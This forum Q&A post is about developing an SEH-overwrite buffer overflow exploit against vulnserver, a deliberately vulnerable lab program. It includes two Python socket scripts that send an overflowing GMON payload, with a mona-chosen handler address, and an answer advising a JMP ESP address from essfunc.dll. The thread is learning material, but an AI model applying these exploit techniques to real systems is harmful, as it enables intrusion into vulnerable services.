# SEH based exploit

Tags: windows, exploit

I've downloaded vulnserver and I want to exploit it using SEH. I managed to overwrite SE Handler successfully, here is the code that I'm using to exploit this program:

```
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.15',9999))

payload = 'GMON /' 
payload += 'A' * (3518)
payload += 'B'*4                # pointer to next SEH record
payload += 'C'*4                # SEH overwrite
payload += 'D'*(5000-len(payload))


s.send(payload)
s.recv(1024)
s.close()
```

The registers look like this:
[image: registers]

And here is the stack: 
[image: stack]

After that I run `!mona seh` to find a suitable dll to use, and chose the first one.
[image: seh]

My payload now looks like this

```
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.15',9999))


payload = 'GMON /' 
payload += 'A' * (3518)
payload += '\xcc'*4                     # payload to next SEH record
payload += '\xb4\x10\x50\x62'           # SEH overwrite
payload += 'D'*(5000-len(payload))


s.send(payload)
s.recv(1024)
s.close()
```

After I run it, this is what the stack and registers look like:
[image: registers1]

[image: stack1]

Why doesn't it hit breakpoint?

I'm working on Windows 7.

Comment: Can you please explain how the question is related to Information Security? The contents might but your question is "Why doesnt it hit breakpoint?" not exactly related here.

Comment: @JoshJones since im trying to exploit it, i believe it is suitable for information security

Comment: As I said the contents of this is related yes. I'm just not sure your question is. You're asking why it's not hitting the breakpoint - I don't believe that question to be related here.

Comment: @TrynaLearnSomethin Josh Jones is correct here. This is not really an Information Security question in the given context, even though everything but the question is. In the context you're providing, it's more of a superuser issue.

Answer (score 1, accepted):

## You may be calling the wrong address

My assembly skills are a little rusty, but I think you are trying to include the address of the DLL loaded in memory (`625010b4`), and not an actual address which would allow you to jump to your shellcode to exploit the buffer overflow. You also do not have any shellcode. With these issues, *even if you fixed the breakpoint problem, you're not going to get a working exploit.*

Open `essfunc.dll` in your immunity debugger and search for a `JMP ESP` instruction and jump directly to that instruction set within memory. Include that memory address instead, not `\xb4\x10\x50\x62`.

---

## Breakpoint problem.

As for why it doesn't trigger the breakpoint... can you clarify that?

- Where is your breakpoint set?
- Is the program not crashing, and therefore not triggering the breakpoint?
- Are you actually running the program in the debugger?
- Have you pressed the "play" icon? Is the program running *in* the debugger?